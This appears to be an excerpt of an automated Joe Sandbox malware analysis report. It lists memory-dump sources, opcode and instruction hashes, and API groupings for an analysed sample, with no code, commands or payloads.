                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                    • Instruction ID: 5fe710eda37714702b4fb139331c293413e6c3f9b048668015a8bcf5e3ad1fd7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4F065B5D0C3808BC718DF28C44062AFBE5AB9A700F10593DD48A93341DB31D545CB4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                    • Instruction ID: 5b26ae1127200bc0dc31935b8bc90fa48281313aac22de08d6efb061dd3b968f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1F069B410D3919FC300DF29D69051BFFE0ABD5318F64EA5CE8DA5B212D334C9028B4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                    • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                    • Instruction ID: 51593c1f7000213fa44c622fa84be07fe4da95a6329e7f989ac4048ac4a7ecf2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90F0EDB1688301BAF6348A00CD43F6BB6B89B95B04F301518B344790E0F5E1B549870E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                    • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                    • Instruction ID: 3b19b52c40c0a7df3666ebed97758c6466fe29bf5a8e33f8d534c760b6e3e174
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F0A735B457808BE704CF38E82199ABBE6E387324F145A7DD641D3751D639C8018605
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                    • Instruction ID: d5bb40fa462c3399fb819596d94617ac233a9107a03160db3f5dd6c428a621ab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74D05E2590C67AC28E2A4E1405501BCA7368A13711B1E59E5DCD17F582DEA6ED0B52D8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                    • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                    • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                    • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                    • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                    • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                    • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                    • Instruction ID: 2e9f91b753fc3c95b80b0108c95503b09ccc953542ffe0837263825be0bcba6b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F419F7150C7818FD301AF78998836FBEE19F86324F484A7DE4D986392DA788548C7A3
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                    • String ID: L
                                                                                                                                                                                                                                                    • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                    • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                    • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                    • String ID: L
                                                                                                                                                                                                                                                    • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                    • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                    • Instruction ID: 90107acfef9dfeab63975fa691e9dac2d2abeecbfc4919b4dd4c501558856264
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6412B7110CBC18ED321DB38845865EBFE16BE6220F188A9CE5F5873E2D6748549CB53
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                    • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86